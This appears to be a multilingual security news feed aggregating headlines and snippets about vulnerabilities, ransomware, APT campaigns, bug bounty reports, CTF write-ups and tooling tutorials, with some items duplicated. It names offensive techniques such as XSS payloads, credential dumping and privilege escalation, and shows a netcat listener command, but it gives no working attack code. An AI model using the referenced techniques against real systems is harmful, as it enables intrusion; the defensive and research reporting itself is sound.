    漏洞研究人员发现了有关于GPS追踪器MiCODUS MV720的安全问题,该追踪器广泛应用在世界50强企业、欧洲政府、美国各州、南美军事机构和核电站运营商等,共计169个国家约150万车辆中。MiCODUS MV720用户地图(BitSight)此次发现MV720设备存在共有6个漏洞,侵入该设备的黑客可以利用它来追踪甚至定位使用该设备的车辆,也可以通过该设备收集有关路线的信息,并操纵数据。考虑到该
    频繁升级,勒索新变种不断涌现
    在过去的几周里,FortiGuard Labs 观察到了几个新的勒索软件变体。
    新型恶意软件CloudMensis 正对 Mac 设备部署后门
    该恶意软件支持数十种命令,包括屏幕截图、窃取文档、记录键盘信息等。
    黑客组织“8220”将云僵尸网络发展到超过 30,000 台主机
    近期,一个名为8220组织的加密采矿团伙利用Linux和云应用程序漏洞将其僵尸网络扩大至30,000多台受感染的主机。该组织的技术并不高,但经济动机强,他们针对运行Docker、Redis、Confluence和Apache漏洞版本的公开系统,感染AWS、Azure、GCP、Alitun和QCloud等主机。该团伙以前的攻击依赖于公开可用的漏洞利用来破坏 Confluence 服务器。在获得访问权
    被滥用的Slack服务:APT29针对意大利的攻击活动分析
    APT29组织的攻击活动可追溯至2008年,主要攻击目标包括西方政府组织机构、智囊团。
  • Open

    SANS / GIAC examinations
    Hi there. I’m going to be taking the GCFE exam in a few months which covers SANS FOR500 material. I have not taken the FOR500 course but do have copies of the materials/books. Does anyone know if I will be able to bring these into the exam even though I have not taken the FOR500 course, as it will affect my indexing if not. Thanks. submitted by /u/Individual_Tax_5842 [link] [comments]
  • Open

    File Permissions in Linux
    No content preview
    TryHackMe — Offensive Security
    No content preview
    Paper from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    File Permissions in Linux
    No content preview
    TryHackMe — Offensive Security
    No content preview
    Paper from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    File Permissions in Linux
    No content preview
    TryHackMe — Offensive Security
    No content preview
    Paper from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    CVE-2020-8558-跨主机访问127.0.0.1
    作者:leveryd 原文链接:https://mp.weixin.qq.com/s/hvb_Kr6DqAPPfnN-lbx1aA 背景 假设机器A和机器B在同一个局域网,机器A使用nc -l 127.0.0.1 8888,在机器B上可以访问机器A上"仅绑定在127.0.0.1的服务"吗? [root@instance-h9w7mlyv ~]# nc -l 127.0.0.1 8888 &a...
    Linux 内核 nftables 子系统研究与漏洞分析
    作者:启明星辰ADLab 原文链接:https://mp.weixin.qq.com/s/ILyBUq--PK01TvNF8Vh9KQ 1 背景 近期,开源安全社区oss-security披露了多个Linux内核netfilter模块相关漏洞,漏洞均出现在netfilter子系统nftables中,其中两个漏洞在内核中存在多年,并且均可用于内核权限提升。漏洞编号分别为:CVE-2022-32...
  • Open

    CVE-2020-8558-跨主机访问127.0.0.1
    作者:leveryd 原文链接:https://mp.weixin.qq.com/s/hvb_Kr6DqAPPfnN-lbx1aA 背景 假设机器A和机器B在同一个局域网,机器A使用nc -l 127.0.0.1 8888,在机器B上可以访问机器A上"仅绑定在127.0.0.1的服务"吗? [root@instance-h9w7mlyv ~]# nc -l 127.0.0.1 8888 &a...
    Linux 内核 nftables 子系统研究与漏洞分析
    作者:启明星辰ADLab 原文链接:https://mp.weixin.qq.com/s/ILyBUq--PK01TvNF8Vh9KQ 1 背景 近期,开源安全社区oss-security披露了多个Linux内核netfilter模块相关漏洞,漏洞均出现在netfilter子系统nftables中,其中两个漏洞在内核中存在多年,并且均可用于内核权限提升。漏洞编号分别为:CVE-2022-32...
  • Open

    Browser API Fuzzing with Dynamic Mod-Ref Analysis [pdf]
    Article URL: https://nebelwelt.net/files/22FSE.pdf Comments URL: https://news.ycombinator.com/item?id=32161267 Points: 1 # Comments: 0

  • Open

    NiCOFF: COFF and BOF Loader written in Nim
    submitted by /u/DarkGrejuva [link] [comments]
    WINDOWS PASSWORD MINING
    submitted by /u/Clement_Tino [link] [comments]
    Master Student In Need Of Red Teamers
    Hello everyone! My name is Andrei and I am a master's student at the Technical University of Eindhoven (The Netherlands). I'm studying Information Security Technology, which is just fancy wording for cybersecurity. Currently, I am working on my master thesis, titled "Analysis of WMI-based Attacks in Microsoft Windows Environments" (the title is a work in progress). The main research idea is to look into what are the differences in how WMI is used by sysadmins vs how it is being misused by threat actors. Then, by identifying these differences, I can choose criteria that can be used for detection systems to lower the number of false positives specifically for WMI. And here comes my question. For my methodology, I need to hold a number of interviews with professionals from the sysadmin pool and from the pentester/red team pool. I am looking in this sub for red teamers who have work experience abusing WMI, who have a max of 45 minutes of free time, and have an open mind to have an informal and fun conversation with a student. The interview is a mix of open questions and filling in an Excel sheet. The sheet contains PowerShell and WMIC commands split into three categories: Enumeration, Code Execution, and Persistence. I am interested if you ever used those commands, in what context, and a concrete example. My list is also open for additions, probably I did not cover every command which can be used. I won't ask for too much personal information, only the name, position, and company you work/worked at. I would like to have a diverse pool of professionals (different companies etc,). I will also send the questions and sheet in advance so you have an idea of how to answer some of them. Thank you for reading and I hope some of you would be interested in helping me or at least forwarding my request to people that would want to help me! And even if you can't help, a like or comment would help bump the post so it can get more attention. submitted by /u/MidWarz [link] [comments]
  • Open

    Caçando classes de vulnerabilidades desconhecidas
    — Based: BlackHatBCS tradc— Continue reading on Medium »
    My Essential Recon Commands
    Resolution Continue reading on Medium »
    Step-wise Checklist for Web Penetration and Bug Hunters
    This checklist may help you to have a suitable methodology for bug bounty hunting. When you have done an action, don’t forget to check ;)… Continue reading on Medium »
    JSON web tokens (JWT) attacks
    What are JWTs? Continue reading on Medium »
    How i was able to bypass Open Redirect 3 times on same program.
    Hello Security folks, Here is interesting finding which I want to share. As you know i only write if it’s unique finding or if my approach… Continue reading on Medium »
  • Open

    War in Ukraine / July 18
    Day 146: Russia can force Ukraine to prolong the war Continue reading on Medium »
    OSINT Cheatsheet (sites,tools)
    Overview Continue reading on Medium »
    How to hire a threat intelligence analyst
    Alongside growing division across the world is a severely unstable, and therefore unpredictable, global economy. Ongoing conflicts, a… Continue reading on Medium »
    CyberSoc CTF — General Knowledge
    Cyber Detective CTF is an OSINT-focussed CTF created by the Cyber Society at Cardiff University. Continue reading on Medium »
    imaginaryCTF: Unpuzzled4
    The Challenge Continue reading on Medium »
    imaginaryCTF: Journey
    The Challenge Continue reading on Medium »
  • Open

    Writeup for Pwn2Own Miami 2022: OPC UA .NET Standard Trusted Application Check Bypass
    submitted by /u/xnyhps [link] [comments]
    Microsoft Azure Arc Logging Passwords in Plaintext
    submitted by /u/dinobyt3s [link] [comments]
    The Workings of Whatsapp's Backups (and why you should enable End-to-End Encrypted Backups)
    submitted by /u/IceCereal [link] [comments]
    chip-red-pill/MicrocodeDecryptor - understand how Intel mitigated spectre vulnerability, explore the implementation of Intel TXT, SGX,VT-x technologies
    submitted by /u/Gallus [link] [comments]
    EJS, Server side template injection RCE (CVE-2022-29078)
    submitted by /u/Gallus [link] [comments]
  • Open

    SecWiki News 2022-07-19 Review
    websocket新型内存马的应急响应 by ourren 从知网被查看网络安全审查 by ourren 如何从 0 到 1 打造国防领域的产品 by ourren 2022 软件供应链安全技术白皮书 by ourren 我认为网络安全工具的未来:开篇 by ourren linux权限维持 by ourren 反-反蜜罐:以三个反蜜罐插件的缺陷为例 by ourren 基于追踪标记的WAF设计思路 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-19 Review
    websocket新型内存马的应急响应 by ourren 从知网被查看网络安全审查 by ourren 如何从 0 到 1 打造国防领域的产品 by ourren 2022 软件供应链安全技术白皮书 by ourren 我认为网络安全工具的未来:开篇 by ourren linux权限维持 by ourren 反-反蜜罐:以三个反蜜罐插件的缺陷为例 by ourren 基于追踪标记的WAF设计思路 by ourren 更多最新文章,请访问SecWiki
  • Open

    Announcing Rust 1.62.1 (Vulnerability Fixed)
    Article URL: https://blog.rust-lang.org/2022/07/19/Rust-1.62.1.html Comments URL: https://news.ycombinator.com/item?id=32152495 Points: 2 # Comments: 0
    Multiple vulnerability leading to account takeover in TikTok SMB subdomain
    Article URL: https://hackerone.com/reports/1404612 Comments URL: https://news.ycombinator.com/item?id=32147645 Points: 2 # Comments: 0
  • Open

    간단하게 ZAP Scripting 배워보기
    오늘은 ZAP Scripting을 처음 접할 때 익숙해지기 좋은 예제 두가지를 소개해볼까 합니다. 이 글을 읽어주시면, 간단한 코드 작성으로 ZAP에서 데이터를 조회하거나, 3rd party 스캔을 요청하는 방법을 얻어가실 수 있을거에요 😊 ZAP Scripting ZAP에서 Scripting은 좌측 Tree Window에서 Scripts를 누르면 각 타입 별 스크립트를 보실 수 있습니다. 그리고 중간의 Workspace window의 Script console을 눌러보시면, 스크립트를 작성하고 테스트해볼 수 있는 공간이 나타납니다. 오늘은 여기서도 Targeted script에 대한 이야기를 하려고 합니다. Targeted Script ZAP에서 Targeted Script는 각 Request/Response에서 실행할 수 있는 Script 입니다. 기본적으로 msg object를 통해 Request와 Response 정보를 가져올 수 있고, 이를 기반으로 스크립트를 작성할 수 있습니다. 보통은 스캔성 작업이나 Payload 생성 등 조금 귀찮은 작업들을 스크립트화 하여 사용하곤 하죠. Structure 구조는 간단합니다. invokeWith 메소드를 정의하면 History에서 우클릭 > Invoke withScripts > 실행할 스크립트 선택 시 해당 스크립트가 실행되고, 이 때 Req/Res 정보를 msg Object로 받게 됩니다. function invokeWith(msg) { // logic! } Msg object 자주 사용되는 코드 스니펫입니다. var url = msg.getRequestHeader().getURI().toString(); // https://www.hahwul.com var host = msg.getRequestHeader().getURI().getHost(); // www.hahwul.com var req = msg.getRequestHeader().toString()+msg.getRequestBody().toString() // POST /blahblah // // a=1 var responseBody = msg.getResponseBody().toString() // // blahblah.. var responseHeader = msg.getResponseHeader().getHeader("Server") // Apache 웹에서 검색하기 openUrlInBrowser org.zaproxy.zap.utils.DesktopUtils.openUrlInBrowser() 함수는 ZAP에서 제공하는 인자 값으로 받은 URL을 브라우저를 통해 여는 기능입니다. Proxy걸린...
  • Open

    AWS EC2 Auto Scaling Privilege Escalation
    Introduction Continue reading on Medium »
  • Open

    Fully Exploiting Data Sources
    Very often, we view data sources as somewhat one dimensional, and don't think about how we can really get value from that data source. We're usually working on a case, just that investigation that's in front of us, and we're so "heads down" that we may not consider that what we see as a single data source, or an entry from that data source (artifact, indicator), is really much more useful, more valuable, than how we're used to viewing it. So, what am I talking about? Let's consider some of the common data sources we access during investigations, and how they're accessed. Consider something that we're looking at during an investigation...say, a data source that we often say (albeit incorrectly) indicates program execution the "AppCompatCache", or "ShimCache". Let's say that we parse the App…
  • Open

    Extracting data from start and end addresses in memory.
    Hello all! I’ve hit a wall with volatility and am looking for advice on what I should do next. So far I have used the unloadedmodules plugin in volatility and have noticed some unloaded .sys files I want to carve out and analyze further. The plug-in displays the start and end address of the file in memory, but how do I use this information in volatility to carve out that section in memory? Any help would be greatly appreciated and thank you! submitted by /u/shikata_ganai [link] [comments]
  • Open

    How to deal with phishing incidents?
    One of my colleagues clicked on a malicious link and logged in with her business email credentials [business Gmail account]. When she found that the email is used for phishing, she changed her password and scanned the laptop. Fortunately, there was no malware downloaded. Are there any steps she should do besides what I already mentioned? submitted by /u/OmegaMan-PT [link] [comments]
    Mimikatz good starting point
    hi, I used mimikatz sometimes (mostly CTFs), but I would like to better understand his concepts. Can someone recommend me a valid starting point (url, youtube video, ..)? thankyou submitted by /u/g-simon [link] [comments]
    Why are those collab tools such as Trello, Jira, Nortion neglected opened without any authentication procedure?
    Perhaps the collab tools are one of the most important servers that must be managed appropriately. But there are so many exposed, opened colla tools without any authentication process. https://blog.criminalip.io/2022/07/01/collaboration-tool-vulnerability/ Default configuration should be more secure, but less. I'd say not even 10% of people using Jira or colla tools understand how authentication works between components. Always people think they're safe, it's not their turn. But this is fundamental reason why the critical datsets of enterprises are sold in dark web or forum. submitted by /u/scopedsecurity101 [link] [comments]
  • Open

    FreeBuf早报 | 苹果App Store存在大量欺诈应用;FBI将全面升级网络基础设施
    FBI对规划架构提出了大量具体的安全要求,如零信任、SASE、强隔离、可见性等。
    针对WordPress插件漏洞的攻击数量激增
    来自Wordfence的研究人员对近期高频率出现的针对WordPress Page Builder插件的网络攻击发出警告。
    利用恶意软件和钓鱼攻击,Roaming Mantis针对Android和iOS用户发起攻击
    在袭击德国、台湾、韩国、日本、美国和英国之后,Roaming Mantis将转向法国。
  • Open

    Russian APT29 Hackers Use Online Storage Services, DropBox and Google Drive
    Cloaked Ursa (aka APT29) has recently used trusted online storage services to deliver Cobalt Strike. The post Russian APT29 Hackers Use Online Storage Services, DropBox and Google Drive appeared first on Unit 42.
  • Open

    HTML Injection in E-mail Not Resolved ()
    Acronis disclosed a bug submitted by thewikiii: https://hackerone.com/reports/1600720
  • Open

    简单理解 V8 Turbofan
    作者:TokameinE@知道创宇404实验室 日期:2022年7月19日 “JavaScript 代码本身就是一个二进制程序。” 不知道读者是否在什么地方听说过这样的解释,但笔者认为这个形容相当生动。因为 JavaScript 的代码是懒惰解释的,只有在特定函数被执行时候,解释器才会对这部分代码进行解释,生成对应的字节码。但这些字节码会随着代码的运行而产生变动,同一份代码有可能在同一次执行...
    Pocsuite3 Tutorial for beginners
    Author: Knownsec 404 Team Chinese version: https://paper.seebug.org/1931/ 1 Introduction Pocsuite3 is a remote vulnerability testing framework based on GPLv2 license and open source created by Kno...
  • Open

    简单理解 V8 Turbofan
    作者:TokameinE@知道创宇404实验室 日期:2022年7月19日 “JavaScript 代码本身就是一个二进制程序。” 不知道读者是否在什么地方听说过这样的解释,但笔者认为这个形容相当生动。因为 JavaScript 的代码是懒惰解释的,只有在特定函数被执行时候,解释器才会对这部分代码进行解释,生成对应的字节码。但这些字节码会随着代码的运行而产生变动,同一份代码有可能在同一次执行...
    Pocsuite3 Tutorial for beginners
    Author: Knownsec 404 Team Chinese version: https://paper.seebug.org/1931/ 1 Introduction Pocsuite3 is a remote vulnerability testing framework based on GPLv2 license and open source created by Kno...
  • Open

    Good things takes time | Story of my first “valid” critical bug!
    No content preview
    Hacking Facebook Invoice: How I could’ve bought anything for Free from Facebook Business Pages
    No content preview
  • Open

    Good things takes time | Story of my first “valid” critical bug!
    No content preview
    Hacking Facebook Invoice: How I could’ve bought anything for Free from Facebook Business Pages
    No content preview
  • Open

    Good things takes time | Story of my first “valid” critical bug!
    No content preview
    Hacking Facebook Invoice: How I could’ve bought anything for Free from Facebook Business Pages
    No content preview
  • Open

    Bunch of classical and Church music
    https://dataup.sdasofia.org/MUSIC/ submitted by /u/chloroformica [link] [comments]
    How to search better than the OD search sites?
    I use all of the open directory search sites, and I do find what Im looking for but is there another method. For example like using google dorks to find files, or some kind of python script etc? submitted by /u/G-Streams [link] [comments]
  • Open

    Which browser is the best to start with? Chrome, Edge, Firefox etc
    I’ve spent the last few months going through the different classes of memory corruption vulns + writing exploits for different CVE’s and want to start diving into VR. Which browser is the most noob friendly? Should I even be targeting browsers at this point in my learning? submitted by /u/Amullatoavibrato [link] [comments]

  • Open

    PDFs of literature in the public domain
    submitted by /u/Nerditter [link] [comments]
    3d modelling stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Question
    Is there a directory of 3d models from sketchfab or anything? (specifically paid ones) Or is there a current reddit post that haves a directory of of 3d models? Or subreddit? Hopefully I'm not breaking the 2nd rule. submitted by /u/Particular_Bed2427 [link] [comments]
  • Open

    Unit 42 Threat Group Naming Update
    Threat group naming helps track and identify attackers' activities. Unit 42 is looking to the stars for an updated approach. The post Unit 42 Threat Group Naming Update appeared first on Unit 42.
  • Open

    new privesc on AWS (DataScientist policy)
    submitted by /u/stk_ [link] [comments]
    /r/netsec's Q3 2022 Information Security Hiring Thread
    Overview If you have open positions at your company for information security professionals and would like to hire from the /r/netsec user base, please leave a comment detailing any open job listings at your company. We would also like to encourage you to post internship positions as well. Many of our readers are currently in school or are just finishing their education. Please reserve top level comments for those posting open positions. Rules & Guidelines Include the company name in the post. If you want to be topsykret, go recruit elsewhere. Include the geographic location of the position along with the availability of relocation assistance or remote work. If you are a third party recruiter, you must disclose this in your posting. Please be thorough and upfront with the position details. Use of non-hr'd (realistic) requirements is encouraged. While it's fine to link to the position on your companies website, provide the important details in the comment. Mention if applicants should apply officially through HR, or directly through you. Please clearly list citizenship, visa, and security clearance requirements. You can see an example of acceptable posts by perusing past hiring threads. Feedback Feedback and suggestions are welcome, but please don't hijack this thread (use moderator mail instead.) submitted by /u/ranok [link] [comments]
    unRAR CVE-2022-30333 deep dive (including full exploit for Zimbra)
    submitted by /u/iagox86 [link] [comments]
    Disrupting Kill Chains with Just-in-Time Access Environments
    submitted by /u/mesok8 [link] [comments]
    Building a process to evaluate security tools
    submitted by /u/LivingInSyn [link] [comments]
    A Deep Dive Into ALPHV/BlackCat Ransomware
    submitted by /u/CyberMasterV [link] [comments]
    Research: Auditing WordPress Plugins (35 CVEs in 3 months)
    submitted by /u/andersonmvd [link] [comments]
  • Open

    How can I block Venntel / Gravy Analytics?
    Venntel and Gravy Analytics use app integration to harvest and sell location data. How can I block this data leak using a firewall rule? Is there a way to know if an app installed on my iPhone or Android report to Venntel or Gravy Analytics? The bulk of the location data ... came from its contract with Venntel, a location data broker based in Virginia. Venntel is a subsidiary of Gravy Analytics, an advertising company that specializes in location data. Gravy Analytics is the leading provider of real-world location intelligence for marketers. ... verifies consumer attendances at millions of places, points-of-interest, and local events, providing unprecedented visibility into the offline consumer journey. Gravy Analytics processes billions of pseudonymous, mobile location signals every day from millions of mobile devices to understand where people go and why. The analytics application platform turns location data into intelligence.... Venntel draws its data from mobile applications such as weather trackers and mobile games, which require location access to play. The company that originally collected that information then sells the data.... submitted by /u/Janice_2022 [link] [comments]
    how to clean up a wordlist?
    I have used crunch to generate 8 digits wordlist. and I would like to remove any result that has a single number repeated sequentially more than 4 times. for example I want to keep these: 0034001 2227422 but remove these: 0000341 2222274 what is the best way to do that? for now, I'm thinking of making another wordlist containing these results and subtracting them from the main wordlist using: comm -2 redundant.txt main.txt > cleaned.txt. but I was wondering if there is a better way. thanks submitted by /u/gamer121323 [link] [comments]
    Does anyone know any free database for URL categorisation?
    As per title - I am aware that these might not be curated, complete or 100% reliable - I was wondering if anyone knows any open source database/collection for URL categorisation. The use case is: given a URL, determine if it points to a) malicious website/IP b) adult content c) religious - just to name a few examples. I am aware that there are resources for a specific use case (malicious IP, websites) and/or there are paid options that address this. submitted by /u/OneEyedMerchant [link] [comments]
    How much karma is needed to post to r/netsec? how old does the account have to be?
    I tried to post content with a fresh account, but the post just get auto-flagged as spam. When trying to reach out to the mods the account was either suspended or the mods are rejecting direct messages. Quit at a loss here? Is there a guideline on how much karma an account needs or how old an account to be to post to r/netsec? TIA. submitted by /u/haxflilet [link] [comments]
  • Open

    Hacking Facebook Invoice: How I could’ve bought anything for Free from Facebook Business Pages
    … Continue reading on InfoSec Write-ups »
    Busy Sunday Because Of Privilege escalation
    How i was able to takeover whole website and get access to account all users, get access to sensitive data of all users , i was able to… Continue reading on Medium »
    MSA Weekly 4 — “How to Get Subdomain’s Using Subfinder & Sudomy”
    Indonesia Continue reading on Medium »
    Hey Google Lets submit bug from Victim Account !
    IntroductionThis is the story of how my bug bounty journey helped me to pay for my college fees. Continue reading on Medium »
    MSA Weekly 4 — “How to Get Subdomain’s Using Subfinder & Sudomy”
    Subdomain enumeration merupakan proses untuk menemukan subdomain dan membantu mengungkapkan domain/sub-domain yang kemungkinan muncul bug… Continue reading on Medium »
    Good things takes time | Story of my first “valid” critical bug!
    Hello there, I am Krishna Agarwal ( Kr1shna 4garwal ) from India 🇮🇳. An ordinary bug hunter and So called security researcher :) Continue reading on Medium »
    Bug Bounty Program
    Resolve bugs … Continue reading on Medium »
    Bug Bounty: Blind XSS Payloads Explained
    This article was originally posted on bepractical.tech Continue reading on Medium »
    MSA Weekly 4 — [How to Get Subdomain’s Using Subfinder & Sudomy]
    Subdomain’s Enumeration Continue reading on Medium »
  • Open

    CVE-2022–35909 / CVE-2022–35910, Incorrect Access Control and XSS Stored to Jellyfin
    This vulnerability on version 10.7.7,(fixed in 10.8.0) Continue reading on stolabs »
  • Open

    War in Ukraine / July 15–17
    Day 145: Russia’s losses are at least 50,000 soldiers Continue reading on Medium »
  • Open

    SecWiki News 2022-07-18 Review
    SecWiki周刊(第437期) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-18 Review
    SecWiki周刊(第437期) by ourren 更多最新文章,请访问SecWiki
  • Open

    Without verifying email and activate account, user can perform all action which are not supposed to be done
    Stripe disclosed a bug submitted by tabaahi: https://hackerone.com/reports/1272305 - Bounty: $100
    subdomain takeover at odoo-staging.exness.io
    EXNESS disclosed a bug submitted by omer: https://hackerone.com/reports/1540252 - Bounty: $100
    unauth mosquitto ( client emails, ips, license keys exposure )
    Acronis disclosed a bug submitted by second_grade_pentester: https://hackerone.com/reports/1578574 - Bounty: $150
    Cross-site scripting (DOM-based)
    OneWeb disclosed a bug submitted by thewikiii: https://hackerone.com/reports/1512644
    CVE-2019-11248 on http://...:9100/debug/pprof/goroutine
    8x8 disclosed a bug submitted by mr_k0anti: https://hackerone.com/reports/1607940
    Public Apache Tomcat /examples example directory
    8x8 disclosed a bug submitted by mr_k0anti: https://hackerone.com/reports/1622624
  • Open

    工控系统谨防PLC和HMI的密码破解软件
    此次攻击活动利用密码破解器软件获取可编程逻辑控制设备(PLC)的权限,并让其成为“肉鸡”,加入僵尸网络。
    FreeBuf早报 | 阿尔巴尼亚政府网站因网络攻击关闭;Tor浏览器可自动绕过互联网审查
    阿尔巴尼亚国家信息社会局表示,由于遭到境外黑客攻击,阿尔巴尼亚政府网站、在线公共服务机构网站暂时关闭。
    赠书福利 | 还不够了解零信任?《白话零信任》一书送给你
    随着云计算和移动办公时代的到来,传统安全模式已经渐渐失效,“零信任”成为当下最受认可的安全架构。
    Digium软件存在漏洞,威胁行为者利用其攻击VoIP服务器
    Unit 42的研究人员发现了一项针对2021年12月以来Digium手机中使用的Elastix系统的活动。
    研究发现,攻击者利用伪造时间戳等方式在GitHub上传播恶意代码
    安全供应商警告说,开发人员需要谨慎对待 GitHub 上的开源项目,其中可能暗藏恶意代码。
    Premint NFT遭史上最大NFT黑客攻击
    知名NFT平台Premint NFT遭到入侵,攻击者盗取了314个NFTs。
    Tor 浏览器迎重大更新,可自动绕过互联网审查
    Tor 项目团队宣布发布 Tor 浏览器 11.5版本,而此次更新就只有一个目的——帮助用户自动绕过互联网审查。
    菲律宾数据合规重点解读
    菲律宾关于数据合规的执法行为严格且全面,且较之他国菲律宾的数据保护法律体系更为庞杂。
  • Open

    websocket 新型内存马的应急响应
    作者:flamingo 原文链接:https://mp.weixin.qq.com/s/T3UfA1plrlG-e9lgfB4whg 前几天看到一个推送,websocket新型内存马。因其自身注册在Ws下面所以常规的内存检测脚本memshell scanner无法快速检出来。 项目地址:https://github.com/veo/wsMemShell 为了防止应急响应的时候翻车...
  • Open

    websocket 新型内存马的应急响应
    作者:flamingo 原文链接:https://mp.weixin.qq.com/s/T3UfA1plrlG-e9lgfB4whg 前几天看到一个推送,websocket新型内存马。因其自身注册在Ws下面所以常规的内存检测脚本memshell scanner无法快速检出来。 项目地址:https://github.com/veo/wsMemShell 为了防止应急响应的时候翻车...
  • Open

    Linux tracing/profiling 基础:符号表、调用栈、perf/bpftrace 示例等(2022)
    整理一些 tracing/profiling 笔记, 内容主要来自 Practical Linux tracing 系列几篇文章。 1 引言 1.1 热点与调用栈分析(perf record/report/script) 1.2 符号(symbols) 1.3 小结 2 极简程序 hello-world:探究符号 2.1 C 源码 2.2 编译成目标文件(不带 -g) 2.3 查看目标文件(objdump/readelf) 2.4 用 bpftrace 跟踪 hello-world 程序执行 2.5 小结 3 符号 3.1 动态符号(.dynsym)vs. 局部符号(.symtab) 3.2 stripped vs. not stripped 3.2.1 手动去掉局部符号(strip -s) 3.2.2 再次用 bpftrace 跟踪局部函数 4 Debug symbol(gcc -g):DWARF 格式 4.1 Debug symbols 的用途或功能 4.1.1 功能一:将内存地址映射到具体某行源代码 4.1.2 功能二:调用栈展开(stack unwinding) 4.2 DWARF 格式存在的一些问题 5 调用栈展开(方式二):frame pointer 5.1 基本原理 5.2 例子 5.3 存在的问题:默认编译参数 -fomit-frame-pointer 6 Profiling & tracing 6.1 Perf profiling 6.2 bpftrace profiling 6.3 bpftrace event tracing Kernel tracing User space tracing 7 /proc/ /* 7.1 /proc/<pi…

  • Open

    Open Redirect .8x8.com
    8x8 disclosed a bug submitted by mr_k0anti: https://hackerone.com/reports/1637571
    Information disclosure ( Google Sales Channel )
    Shopify disclosed a bug submitted by hydraxanon82: https://hackerone.com/reports/1584718 - Bounty: $500
  • Open

    Mock Investigations or Training Cases??
    Anyone familiar with any sites or programs that you can try what you may know and perhaps some that show you an disk image and may show you things that you may have missed? Nearly a year of General Ed classes since my last Forensics class has taken a toll and i'm trying to refresh. Any help would be appreciated. Thanks. submitted by /u/DeviantWolfe [link] [comments]
    PowerShell command history (windows forensics)
    When running a PowerShell command or a ps1 script, what forensic evidence is left behind? I know of the event logs and general PowerShell history. Is there any where else that can be investigated to see if PowerShell commands have been executed? or any particular arftifects to look for? Still new to windows forensics, thanks in advance :) submitted by /u/EnormousJohnson [link] [comments]
    Where can I find useful system logs in windows and Linux beside the basic event viewer and journalctl logs?
    I work on debugging system error and want to get good at forensics. Where can I find good system logs. Sorry if it's basic question. submitted by /u/iObjectUrHonor [link] [comments]
  • Open

    A little bit of housekeeping please.
    Apologies mods - not trying to add to any workload but there are a few glaring issues. could we reroute the search box to either koalabear84's search or site:reddit.com/r/opendirectories %s either has pros and cons but reddit search is objectively shit while we're at it - since we have to add a flair/tag when we post could we not also implement a mandatory search in the posting process? I know reddit kinda implements this atm but again, it's search is frankly fucking dismal. finally: in the reporting dialog could we add a couple of entries: This has been reposted more times than that reaction pic of THIS IS NOT AN OPEN DIRECTORY EDITED. submitted by /u/ringofyre [link] [comments]
  • Open

    Join the Morningstar's Discord Server! tells you ways to get free stuff from websites
    submitted by /u/nightmarejh10 [link] [comments]
  • Open

    Finding 0-days in Enterprise Application
    No content preview
    FFUF-ing RECON
    , or how to get to P1–P3 from a slightly different recon Continue reading on InfoSec Write-ups »
  • Open

    Finding 0-days in Enterprise Application
    No content preview
    FFUF-ing RECON
    , or how to get to P1–P3 from a slightly different recon Continue reading on InfoSec Write-ups »
  • Open

    Finding 0-days in Enterprise Application
    No content preview
    FFUF-ing RECON
    , or how to get to P1–P3 from a slightly different recon Continue reading on InfoSec Write-ups »
  • Open

    Finding 0-days in Enterprise Application
    A tale of ‘Site-wide Account Takeover’ Continue reading on InfoSec Write-ups »
    Gauing+Nuclei for Instant Bounties
    Back again with the instant bounties series. Last time we learned how to score instant bounties with Google dorks so check that out if you… Continue reading on Medium »
    FFUF-ing RECON
    , or how to get to P1–P3 from a slightly different recon Continue reading on InfoSec Write-ups »
    A Story Of My First Bug Bounty
    Hello everyone, Continue reading on Medium »
    MSA Weekly 4 — “Cara Mendapatakn Subdomain Menggunakan Subfinder & Sudomy
    Dalam proses penetration atau hacking ada beberapa step/workflow yang biasa dilakukan oleh para penetration tester atau hacker sebelum… Continue reading on Medium »
    Web Application Security & OWASP’s Juice Shop
    Throughout my entire IT career, I have always felt I lack programming and web development skills. This stems from the fact that I have… Continue reading on Medium »
    Intro to Bug Bounty Hunting.
    Hey Guys! Hope you all are doing great! Continue reading on Medium »
    A Simple Buffer Overflow Demonstration — Part 2
    Hello Security folks, In previous article, we came to know about what is Buffer Overflow, Its types, and how it occurs. In this article… Continue reading on Medium »
  • Open

    LSASS Memory Dump and Detection
    Basic Overview Continue reading on Medium »
  • Open

    SecWiki News 2022-07-17 Review
    应急能力提升6:应急响应专题总结会 by aerfa 应急能力提升5:应急响应报告点评 by aerfa 应急能力提升4:实战应急响应经验 by aerfa 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-17 Review
    应急能力提升6:应急响应专题总结会 by aerfa 应急能力提升5:应急响应报告点评 by aerfa 应急能力提升4:实战应急响应经验 by aerfa 更多最新文章,请访问SecWiki
  • Open

    新型RedAlert勒索病毒针对VMWare ESXi服务器
    新型RedAlert勒索病毒针对VMWare ESXi服务器
    pythonweb SSTI的payload构造思路研究
    文前漫谈接触到pythonweb SSTI也有一段时间了,给我的感觉就是原理也容易理解,但是在利用上总有些难度。(不能够灵活运用),想来想去还是原理不太清楚,借着这篇文章,从初学者的角度,从原理的方向
    SSH协议中隧道与代理的用法详解
    关于ssh协议中的隧道连接与代理的相关用法详解
    SAFEIS:UNISWAP安全事件溯源分析!
    针对UNISWAP的黑客攻击事件,很多用户损失惨重,其中不乏知名人士。
  • Open

    51 OSINT extensions for Chrome
    Let’s try to turn the standard CHROME browser into a full-fledged OSINT explorer tool. Continue reading on Medium »
    SPY NEWS: 2022 — Week 28
    Summary of the espionage-related news stories for the Week 28 (July 10–16) of 2022. Continue reading on Medium »
    Mengidentifikasi Perekrut Buzzer MyPertamina
    Per tanggal 1 Juli 2022, Pertamina telah menguji coba pembelian bahan bakar menggunakan aplikasi MyPertamina. Banyak pro dan kontra di… Continue reading on Medium »
    Who’s this war against? Data from June
    Data suggests Russia’s attention in its invasion of Ukraine is directed more towards westward ‘unfriendly’ countries than to Ukraine… Continue reading on Medium »
  • Open

    GitHub - karimhabush/cyberowl: A daily updated summary of the most frequent types of security incidents currently being reported from different sources.
    submitted by /u/karimhabush [link] [comments]
    Build your first LLVM Obfuscator
    submitted by /u/CyberMasterV [link] [comments]
  • Open

    StartupApproved\Run, pt II
